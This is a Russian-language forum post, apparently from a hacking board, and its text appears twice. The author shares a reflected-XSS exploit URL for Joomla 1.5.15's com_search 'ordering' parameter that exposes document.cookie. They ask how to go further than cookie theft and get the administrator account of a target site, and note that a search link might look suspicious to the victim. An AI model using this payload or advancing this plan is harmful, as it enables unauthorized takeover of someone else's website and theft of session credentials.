DieWithMe
26.02.2011, 12:56
Нагуглил уязвимость в джумле версии 1.5.15
эксплоит:victim/index.php?option=com_search&searchword=xss&searchphrase=any&ordering=newest%22%20onmousemove=alert%28document. cookie%29%20style=position:fixed;top:0;left:0;widt h:100%;height:100%;%22
Что с ней можно сделать кроме кражи кукисов через XSS?
Просто мне нужен админ в идеале, и я более чем уверен, что пароль у него 12+ символьный, т.е. пробрутить не получиться. И вообще, странновато будет давать ссылку на поиск...
эксплоит:victim/index.php?option=com_search&searchword=xss&searchphrase=any&ordering=newest%22%20onmousemove=alert%28document. cookie%29%20style=position:fixed;top:0;left:0;widt h:100%;height:100%;%22
Что с ней можно сделать кроме кражи кукисов через XSS?
Просто мне нужен админ в идеале, и я более чем уверен, что пароль у него 12+ символьный, т.е. пробрутить не получиться. И вообще, странновато будет давать ссылку на поиск...